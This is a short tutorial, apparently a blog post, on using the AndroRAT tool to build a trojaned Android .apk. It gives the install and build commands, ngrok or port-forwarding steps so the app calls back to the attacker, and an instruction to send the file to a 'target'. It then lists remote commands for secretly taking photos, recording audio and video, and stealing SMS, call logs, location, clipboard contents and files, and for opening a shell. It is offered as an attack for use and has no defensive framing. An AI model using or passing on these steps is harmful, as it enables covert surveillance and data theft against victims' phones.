.apk Trojan Creating Tool - AndroRAT


21 Kas 2021


Greetings dear users, today I'll show you a tool that creates .apk file with Trojan inside.
First, open your terminal on Kali.

Use git clone command.
After clonning process has been done, open folder by using cd command.
Use pip3 command to install necessary materials.
pip3 install -r requirements.txt
Almost done, use python3 command to open AndroRAT.py file.
python3 androRAT.py -h
You can see parameters here.


Setting Up Ngrok Tunnel

Go to Ngrok's website and register. Then go to your dashboard, choose Your Authtoken option and copy your authtoken.


Get back to terminal, use:
cd /home/(User)local/bin/
Then use:
python3 ngrok authtoken YourToken
Ngrok server is ready.

To create an apk file which will be on ngrok tunnel, use:
python3 androRAT.py --build --ngrok -o rat.apk
Creating .apk Without Ngrok

Open the terminal. Use ifconfig command. Copy your inet adress. And open 8000 port on your router.
Turn to androRAT folder, use this command to create .apk with your own net.
python3 androRAT.py --build -i 192.169.x.x -p 8000 -o rat.apk

Now our trojan is ready, send it to your target. Whenever your victim opens it, you will be able to use Interpreter commands.


deviceInfo --> returns basic info of the device
camList --> returns cameraID
takepic [cameraID] --> Takes picture from camera
startVideo [cameraID] --> starts recording the video
stopVideo --> stop recording the video and return the video file
startAudio --> starts recording the audio
stopAudio --> stop recording the audio
getSMS [inbox|sent] --> returns inbox sms or sent sms in a file
getCallLogs --> returns call logs in a file
shell --> starts a sh shell of the device
vibrate [number_of_times] --> vibrate the device number of time
getLocation --> return the current location of the device
getIP --> returns the ip of the device
getSimDetails --> returns the details of all sim of the device
clear --> clears the screen
getClipData --> return the current saved text from the clipboard
getMACAddress --> returns the mac address of the device
exit --> exit the interpreter
get [full_file_path] --> donwloads the file to the local machine (file size upto 15mb)
put [filename] --> uploads the file to the android device

That's it for today, thanks for reading.
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